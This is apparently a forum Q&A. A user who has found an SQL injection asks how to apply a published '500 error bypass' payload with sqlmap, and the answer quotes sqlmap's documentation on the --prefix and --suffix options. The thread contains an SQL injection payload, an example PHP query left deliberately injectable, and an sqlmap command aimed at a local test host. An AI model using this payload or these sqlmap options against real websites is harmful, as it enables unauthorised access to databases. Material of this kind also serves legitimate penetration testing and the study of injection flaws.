How too use R0b0tPirates 500 error bypass

Question

I had a valid injection, but could not exploit it due to 500 errors, so I looked around and found that R0b0t Pirates, a blog that specializes in tools like sqlmap, has put out a
500 error bypass, telling you somehow add this to the query, with no information but a title:

+AND(SELECT 1)=(SELECT 0X41414141414141414141414141414141414141414141414141414141414141414141414141414141
4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+

My question is how you add this to the query. Do you add it as a prefix, a sufix, a regex?

Answer 1

The "Custom Injection Payload" section of the SQLMap Documentation explains how to add a bypass like this. It seems to me you would use --suffix followed by the AND clause you pasted above.

Here is the text from the docs:

Custom injection payload

Options: --prefix and --suffix

In some circumstances the vulnerable parameter is exploitable only if the user provides a specific suffix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and suffix.

Example of vulnerable source code:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

To detect and exploit this SQL injection, you can either let sqlmap detect the boundaries (as in combination of SQL payload prefix and suffix) for you during the detection phase, or provide them on your own.

For example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" \
-p id --prefix "')" --suffix "AND ('abc'='abc"
[...]

This will result in all sqlmap requests to end up in a query as follows:

$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";

Which makes the query syntactically correct.

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide custom boundaries, but sometimes in real world application it is necessary to provide it when the injection point is within nested JOIN queries for instance.